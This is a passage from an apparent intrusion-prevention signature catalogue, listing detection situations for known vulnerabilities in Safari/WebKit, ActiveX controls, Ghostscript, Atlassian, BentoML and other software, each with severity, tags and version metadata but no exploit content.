First detected in: sgpkg-ips-581-5211
Last changed: sgpkg-ips-1283-5242
Vulnerability: Apple-Safari-Objc-MsgSend-RTP-DoS
Description:
Back to top

File-Text_Apple-Safari-Parent.close-Code-Execution

About this situation: An attempt to exploit a vulnerability in Apple Safari detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Safari, CVE2010, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: Apple-Safari-Parent.close-Code-Execution
Description:
Back to top

File-Text_Apple-Safari-Right-To-Left-Text-Rendering-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Apple Safari detected
Context: Text File Stream
Severity: 7
Tags: Windows, Mac OS X, Any Hardware, Safari, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1336-5242
Vulnerability: Apple-Safari-Right-To-Left-Text-Rendering-Use-After-Free
Description:
Back to top

File-Text_Apple-Safari-Url-Handling-Cross-Origin-Security-Bypass

About this situation: An attempt to exploit a vulnerability in Apple Computer Safari detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Safari, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-657-5211
Last changed: sgpkg-ips-1336-5242
Vulnerability: Apple-Safari-Url-Handling-Cross-Origin-Security-Bypass
Description:
Back to top

File-Text_Apple-Safari-Webkit-Arbitrary-File-Creation

About this situation: An attempt to exploit an Apple Safari Webkit Arbitrary File Creation vulnerability detected.
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Webkit, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-741-5211
Last changed: sgpkg-ips-741-5211
Vulnerability: Apple-Safari-Webkit-Arbitrary-File-Creation
Description:
Back to top

File-Text_Apple-Safari-Webkit-Attribute-Child-Removal-Code-Execution

About this situation: An attempt to exploit a vulnerability in Apple Safari detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Safari, CVE2010, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: Apple-Safari-Webkit-Attribute-Child-Removal-Code-Execution
Description:
Back to top

File-Text_Apple-Safari-Webkit-Button-Column-Blocks-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Apple Computer Safari detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Safari, CVE2012, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-826-5242
Last changed: sgpkg-ips-1286-5242
Vulnerability: Apple-Safari-Webkit-Button-Column-Blocks-Memory-Corruption
Description:
Back to top

File-Text_Apple-Safari-Webkit-Button-First-Letter-Style-Rendering-Code-Execution

About this situation: An attempt to exploit a vulnerability in Apple Safari detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Safari, CVE2010, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1336-5242
Vulnerability: Apple-Safari-Webkit-Button-First-Letter-Style-Rendering-Code-Execution
Description:
Back to top

File-Text_Apple-Safari-Webkit-CSS-Charset-Text-Transformation-Code-Execution

About this situation: An attempt to exploit a vulnerability in Apple Safari detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Safari, CVE2010, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: Apple-Safari-Webkit-CSS-Charset-Text-Transformation-Code-Execution
Description:
Back to top

File-Text_Apple-Safari-Webkit-CSS-Title-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Apple Computer Safari detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Safari, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1336-5242
Vulnerability: Apple-Safari-Webkit-CSS-Title-Memory-Corruption
Description:
Back to top

File-Text_Apple-Safari-Webkit-Floating-Point-Buffer-Overflow

About this situation: Detected an attempt to exploit a vulnerability in Apple Safari
Context: Text File Stream
Severity: 7
Tags: Windows, Mac OS X, Any Hardware, Safari, CVE2009, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-448-4219
Vulnerability: Apple-Safari-Webkit-Floating-Point-Buffer-Overflow
Description:
Back to top

File-Text_Apple-Safari-Webkit-Floating-Point-Data-Type-Code-Execution

About this situation: An attempt to exploit a vulnerability in Apple Safari detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Safari, CVE2010, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1336-5242
Vulnerability: Apple-Safari-Webkit-Floating-Point-Data-Type-Code-Execution
Description:
Back to top

File-Text_Apple-Safari-Webkit-Innerhtml-Double-Free-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Apple Computer Safari detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Safari, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1336-5242
Vulnerability: Apple-Safari-Webkit-Innerhtml-Double-Free-Memory-Corruption
Description:
Back to top

File-Text_Apple-Safari-Webkit-Menu-Onchange-Memory-Corruption

About this situation: Attempt to exploit a vulnerability in Apple Safari detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Safari, CVE2010, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1287-5242
Vulnerability: Apple-Safari-Webkit-Menu-Onchange-Memory-Corruption
Description:
Back to top

File-Text_Apple-Safari-Webkit-Option-Element-Contenteditable-Code-Execution

About this situation: An attempt to exploit a vulnerability in Apple Safari detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Safari, CVE2010, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-431-4219
Last changed: sgpkg-ips-1336-5242
Vulnerability: Apple-Safari-Webkit-Option-Element-Contenteditable-Code-Execution
Description:
Back to top

File-Text_Apple-Safari-Webkit-Range-Object-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Apple Computer Safari detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Safari, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1336-5242
Vulnerability: Apple-Safari-Webkit-Range-Object-Remote-Code-Execution
Description:
Back to top

File-Text_Apple-Safari-Webkit-Rendering-Counter-Code-Execution

About this situation: An attempt to exploit a vulnerability in Apple Safari detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Safari, CVE2010, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: Apple-Safari-Webkit-Rendering-Counter-Code-Execution
Description:
Back to top

File-Text_Apple-Safari-Webkit-Selections-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Apple Safari detected
Context: Text File Stream
Severity: 7
Tags: Windows, Mac OS X, Any Hardware, Safari, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1771-5242
Vulnerability: Apple-Safari-Webkit-Selections-Use-After-Free
Description:
Back to top

File-Text_Apple-Safari-Webkit-SVG-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Apple Computer Safari detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Safari, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1336-5242
Vulnerability: Apple-Safari-Webkit-SVG-Memory-Corruption
Description:
Back to top

File-Text_Apple-Safari-Webkit-Use-After-Free-Code-Execution

About this situation: An attempt to exploit a vulnerability in Apple Safari detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Safari, CVE2010, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1336-5242
Vulnerability: Apple-Safari-Webkit-Use-After-Free-Code-Execution
Description:
Back to top

File-Text_Apple-Safari-Webkit-Webarchive-Injection

About this situation: An attempt to exploit an Apple Safari Webkit Webarchive Injection vulnerability detected.
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Safari, CVE2015, Any Operating System not specific, Potential Disclosure
First detected in: sgpkg-ips-767-5211
Last changed: sgpkg-ips-1283-5242
Vulnerability: Apple-Safari-Webkit-Webarchive-Injection
Description:
Back to top

File-Text_Apple-Safari-Webkit-XSS-Vulnerability-CVE-2017-7089

About this situation: An attempt to exploit a vulnerability in WebKit detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Webkit, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1770-5242
Last changed: sgpkg-ips-1770-5242
Vulnerability: Apple-Safari-Webkit-XSS-Vulnerability-CVE-2017-7089
Description:
Back to top

File-Text_Apple-Safari-Windows-JavaScript-Infinite-Document-Write

About this situation: Safari Windows Javascript Infinite document.write() detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Safari, CVE2008, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-581-5211
Last changed: sgpkg-ips-1336-5242
Vulnerability: Apple-Safari-Insecure-JavaScript-Usage
Description:
Back to top

File-Text_Apple-Webkit-Code-Execution-Vulnerability-CVE-2011-2813

About this situation: An attempt to exploit a vulnerability in Apple WebKit detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Webkit, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-739-5211
Vulnerability: Apple-Webkit-Code-Execution-Vulnerability-CVE-2011-2813
Description:
Back to top

File-Text_Apple-Webkit-Cross-Site-Scripting-CVE-2021-1879

About this situation: An attempt to exploit a vulnerability in Apple WebKit detected
Context: Text File Stream
Severity: 7
Tags: iOS, Any Hardware, Webkit, CVE2021, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1404-5242
Last changed: sgpkg-ips-1404-5242
Vulnerability: Apple-Webkit-Cross-Site-Scripting-CVE-2021-1879
Description:
Back to top

File-Text_Apple-Webkit-Memory-Corruption-CVE-2016-4657

About this situation: An attempt to exploit a vulnerability in Apple Webkit detected
Context: Text File Stream
Severity: 7
Tags: iOS, Any Hardware, Webkit, CVE2016, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1814-5242
Last changed: sgpkg-ips-1814-5242
Vulnerability: Apple-Webkit-Memory-Corruption-CVE-2016-4657
Description:
Back to top

File-Text_Apple-Webkit-Rowspan-DoS

About this situation: Apple Webkit rowspan Denial of Service detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Webkit, CVE2007, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-581-5211
Last changed: sgpkg-ips-625-5211
Vulnerability: Apple-Webkit-Rowspan-DoS
Description:
Back to top

File-Text_Apple-Webkit-Ruby-Annotation-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Google Chrome detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Safari, Chrome, Apple iTunes, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-421-4219
Last changed: sgpkg-ips-1336-5242
Vulnerability: Apple-Webkit-Ruby-Annotation-Memory-Corruption
Description:
Back to top

File-Text_Apport-Remote-Code-Execution-Via-CrashDB-Field-CVE-2016-9949

About this situation: An attempt to exploit a vulnerability in Apport detected
Context: Text File Stream
Severity: 7
Tags: Linux, Any Hardware, Apport, CVE2016, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1791-5242
Last changed: sgpkg-ips-1791-5242
Vulnerability: Apport-Remote-Code-Execution-Via-CrashDB-Field-CVE-2016-9949
Description:
Back to top

File-Text_Arris-Motorola-Surfboard-SBG6580-Multiple-Vulnerabilites

About this situation: An attempt to exploit multiple vulnerabilities in Arris Motorola Surfboard SBG6580.
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Arris Motorola Surfboard, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-687-5211
Last changed: sgpkg-ips-1225-5242
Vulnerability: Arris-Motorola-Surfboard-SBG6580-Multiple-Vulnerabilites
Description:
Back to top

File-Text_Artifex-Ghostscript-PostScript-Handling-S_xbcpe_process-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Artifex Software Ghostscript detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Ghostscript, CVE2023, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1587-5242
Last changed: sgpkg-ips-1587-5242
Vulnerability: Artifex-Ghostscript-PostScript-Handling-S_xbcpe_process-Buffer-Overflow
Description:
Back to top

File-Text_Artifex-Ghostscript-PostScript-Sandbox-Bypass-CVE-2018-17961

About this situation: An attempt to exploit a vulnerability in Ghostscript detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Ghostscript, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1771-5242
Last changed: sgpkg-ips-1771-5242
Vulnerability: Artifex-Ghostscript-PostScript-Sandbox-Bypass-CVE-2018-17961
Description:
Back to top

File-Text_Ask-Toolbar-ActiveX-Control-ShortFormat-Property-Buffer-Overflow

About this situation: Attempt to exploit a vulnerability in Ask Toolbar detected
Context: Text File Stream
Severity: 10
Tags: Windows, x86, Ask Toolbar, CVE2007, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: Ask-Toolbar-ActiveX-Control-ShortFormat-Property-Buffer-Overflow
Description:
Back to top

File-Text_Asp-Scripting-In-Server-Reply

About this situation: Detected ASP scripting in the server reply
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-643-5211
Vulnerability: Web-Server-Side-Script-Disclosure
Description:
Back to top

File-Text_Astium-Remote-Code-Execution

About this situation: An attempt to exploit an Astium Remote Code Execution vulnerability detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Astium, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-800-5242
Last changed: sgpkg-ips-800-5242
Vulnerability: Astium-Remote-Code-Execution
Description:
Back to top

File-Text_Asus-Net4Switch-Ipswcom.dll-ActiveX-Control-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in ASUS Net4Switch ipswcom.dll detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ASUS Net4Switch, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-863-5242
Vulnerability: Asus-Net4Switch-Ipswcom.dll-ActiveX-Control-Stack-Buffer-Overflow
Description:
Back to top

File-Text_AtHoc-IWSAlerts-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in AtHoc ISWAlerts ActiveX Control detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, AtHoc IWSAlerts, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-630-5211
Vulnerability: AtHoc-IWSAlerts-ActiveX-Control-ControlFile-Buffer-Overflow
Description:
Back to top

File-Text_Atlassian-Companion-Suspicious-Script

About this situation: An attempt to exploit a vulnerability in Atlassian Companion detected
Context: Text File Stream
Severity: 7
Tags: Mac OS X, Any Hardware, CVE2023, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1667-5242
Last changed: sgpkg-ips-1667-5242
Vulnerability: Atlassian-Companion-Remote-Code-Execution-CVE-2023-22524
Description:
Back to top

File-Text_Atlassian-JIRA-Email-Templates-Server-Side-Template-Injection

About this situation: An attempt to exploit a vulnerability in Atlassian JIRA detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Atlassian JIRA, CVE2022, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1566-5242
Last changed: sgpkg-ips-1566-5242
Vulnerability: Atlassian-JIRA-Email-Templates-Server-Side-Template-Injection
Description:
Back to top

File-Text_Attachmate-Reflection-FTP-Client-ActiveX-Getglobalsettings-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Attachmate INFOConnect Enterprise detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Attachmate INFOConnect Enterprise, Attachmate Reflection FTP Client, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-601-5211
Last changed: sgpkg-ips-630-5211
Vulnerability: Attachmate-Reflection-FTP-Client-ActiveX-Getglobalsettings-Memory-Corruption
Description:
Back to top

File-Text_Aurigma-Image-Uploader-ActiveX-Control-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Aurigma Image Uploader detected
Context: Text File Stream
Severity: 2
Tags: Windows, Any Hardware, Aurigma Image Uploader, Windows not specific, Potential Denial of Service
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-551-5211
Vulnerability: Aurigma-Image-Uploader-ActiveX-Control-Denial-Of-Service
Description:
Back to top

File-Text_Aurigma-Image-Uploader-Buffer-Overflow

About this situation: Attempt to exploit a vulnerability in Aurigma Image Uploader ActiveX control
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Aurigma Image Uploader, Myspace Uploader, CVE2008, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-630-5211
Vulnerability: Aurigma-Image-Uploader-Buffer-Overflow
Description:
Back to top

File-Text_Autodesk-IDrop-ActiveX-Control-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Autodesk i-drop ActiveX Control detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, Autodesk i-drop, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-630-5211
Vulnerability: Autodesk-IDrop-ActiveX-Control-ControlFile-Buffer-Overflow
Description:
Back to top

File-Text_Autodesk-Liveupdate-ActiveX-Control-Code-Execution

About this situation: An attempt to exploit a vulnerability in Autodesk LiveUpdate ActiveX control detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Autodesk Revit Architecture, Autodesk Design Review, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-551-5211
Vulnerability: Autodesk-Liveupdate-ActiveX-Control-Code-Execution
Description:
Back to top

File-Text_Aviosys-IP-POWER-9258-W2-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in IP POWER 9258 W2 detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, IP POWER 9258 W2, Any Operating System not specific, Disclosure, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-610-5211
Vulnerability: Aviosys-IP-POWER-9258-W2-Information-Disclosure
Description:
Back to top

File-Text_AwingSoft-Winds3D-Player-Command-Execution

About this situation: An attempt to exploit an AwingSoft Winds3D Player Command Execution vulnerability detected.
Context: Text File Stream
Severity: 7
Tags: Windows XP SP3, Any Hardware, AwingSoft Winds3D Player, CVE2009, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-722-5211
Last changed: sgpkg-ips-722-5211
Vulnerability: AwingSoft-Winds3D-Player-Command-Execution
Description:
Back to top

File-Text_AwingSoft-Winds3D-Player-SceneURL-Buffer-Overflow

About this situation: An attempt to exploit an AwingSoft-Winds3D-Player-SceneURL-Buffer-Overflow vulnerability detected.
Context: Text File Stream
Severity: 7
Tags: Windows XP, Any Hardware, AwingSoft Winds3D Player, CVE2009, Windows XP not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-722-5211
Last changed: sgpkg-ips-766-5211
Vulnerability: AwingSoft-Winds3D-Player-SceneURL-Buffer-Overflow
Description:
Back to top

File-Text_Axis-Camera-Control-ActiveX-Control-SetBMP-Buffer-Overflow

About this situation: Use of vulnerable method of AXIS Camera Control ActiveX control detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, AXIS Camera Control, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-573-5211
Vulnerability: Axis-Camera-Control-ActiveX-Control-SetBMP-Buffer-Overflow
Description:
Back to top

File-Text_Axis-Communications-Camera-Control-ActiveX-Object

About this situation: An usage of AXIS Communication Camera Control ActiveX Object detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, AXIS Camera Control, CVE2007, CVE2008, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-573-5211
Vulnerability: Axis-Camera-Control-ActiveX-Control-SetBMP-Buffer-Overflow
Axis-Communications-Camera-Control-Image-Pan-Tilt-Buffer-Overflow
Description:
Back to top

File-Text_Axis-Media-Control-Unsafe-ActiveX-Method

About this situation: An attempt to exploit a vulnerability in an AXIS device detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, AXIS Camera Application Platform, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1772-5242
Last changed: sgpkg-ips-1772-5242
Vulnerability: Axis-Media-Control-Unsafe-ActiveX-Method
Description:
Back to top

File-Text_Axis-Network-Camera-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Axis Network Camera detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, AXIS Camera Control, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1112-5242
Last changed: sgpkg-ips-1112-5242
Vulnerability: Axis-Network-Camera-Remote-Code-Execution
Description:
Back to top

File-Text_Backdoor-Script-Serv-U-FTP-User-CVE-2021-35211

About this situation: An attempt to execute a backdoor of CVE-2021-35211 detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2021, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1373-5242
Last changed: sgpkg-ips-1373-5242
Vulnerability: Backdoor-Script-Serv-U-FTP-User-CVE-2021-35211
Description:
Back to top

File-Text_Baidu-Soba-Search-Bar-File-Download-And-Execute

About this situation: Detected an attempt to arbitrary file download and execute vulnerability in Baidu Soba Search Bar
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, Baidu Soba Search Bar, CVE2007, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: Baidu-Soba-Search-Bar-File-Download-And-Execute
Description:
Back to top

File-Text_BaoFeng-Storm-ActiveX-Control-Multiple-Methods-Buffer-Overflow

About this situation: An attempt to exploit vulnerabilities in BaoFeng Storm detected
Context: Text File Stream
Severity: 10
Tags: Windows, x86, BaoFeng Storm, CVE2007, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: BaoFeng-Storm-ActiveX-Control-Multiple-Methods-Buffer-Overflow
Description:
Back to top

File-Text_BaoFeng-Storm-ActiveX-Control-Multiple-Methods-Buffer-Overflow-2

About this situation: An attempt to exploit vulnerabilities in BaoFeng Storm detected
Context: Text File Stream
Severity: 10
Tags: Windows, x86, BaoFeng Storm, CVE2007, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: BaoFeng-Storm-ActiveX-Control-Multiple-Methods-Buffer-Overflow
Description:
Back to top

File-Text_Base64-Encoded-HTML-Object

About this situation: Detected base64 encoded HTML object
Context: Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Information
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-573-5211
Description:
Back to top

File-Text_Bennet-Tec-TList-ActiveX-SaveData-Arbitrary-File-Creation

About this situation: An attempt to exploit a vulnerability in Bennet-Tec TList detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Hyperion Financial Management, Bennet-Tec TList, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-424-4219
Last changed: sgpkg-ips-551-5211
Vulnerability: Bennet-Tec-TList-ActiveX-SaveData-Arbitrary-File-Creation
Description:
Back to top

File-Text_BentoML-RCE-CVE-2025-27520

About this situation: An attempt to exploit a vulnerability in BentoML detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, BentoML, CVE2025, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, 4th Most Recent Update, 5th Most Recent Update
First detected in: sgpkg-ips-1870-5242
Last changed: sgpkg-ips-1870-5242
Vulnerability: BentoML-RCE-CVE-2025-27520
Description:
Back to top

File-Text_BentoML-Runner-Server-RCE-CVE-2025-32375

About this situation: An attempt to exploit a vulnerability in BentoML detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, BentoML, CVE2025, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, 4th Most Recent Update, 5th Most Recent Update
First detected in: sgpkg-ips-1870-5242
Last changed: sgpkg-ips-1870-5242
Vulnerability: BentoML-Runner-Server-RCE-CVE-2025-32375
Description:
Back to top

File-Text_BitDefender-Online-Scanner-ActiveX-Control-Buffer-Overflow

About this situation: Detected an attempt to use the vulnerable method of the BitDefender Online Scanner ActiveX control
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Softwin BitDefender Online Scanner, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-551-5211
Vulnerability: BitDefender-Online-Scanner-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_Black-Ice-BIDIB.ocx-ActiveX-Arbitrary-File-Download

About this situation: A reference to a vulnerable method in the Black Ice BIImgFrm.ocx ActiveX Control was detected.
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Black Ice, CVE2008, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-732-5211
Last changed: sgpkg-ips-766-5211
Vulnerability: Black-Ice-BIDIB.ocx-ActiveX-Arbitrary-File-Download
Description:
Back to top

File-Text_BlazeVideo-BlazeDVD-Pro-PLF-File-Processing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in BlazeVideo BlazeDVD Professional detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, BlazeVideo BlazeDVD Professional, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-602-5211
Vulnerability: BlazeVideo-BlazeDVD-Pro-PLF-File-Processing-Buffer-Overflow
Description:
Back to top

File-Text_Broadwin-WebAccess-Client-Bwocxrun-ActiveX-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Broadwin Technology WebAccess Client detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Broadwin WebAccess Client, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-568-5211
Last changed: sgpkg-ips-568-5211
Vulnerability: Broadwin-WebAccess-Client-Bwocxrun-ActiveX-Memory-Corruption
Description:
Back to top

File-Text_Broadwin-WebAccess-Client-Bwocxrun-ActiveX-Ocxspool-Format-String

About this situation: An attempt to exploit a vulnerability in Broadwin Technology WebAccess Client detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Broadwin WebAccess Client, CVE2012, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-568-5211
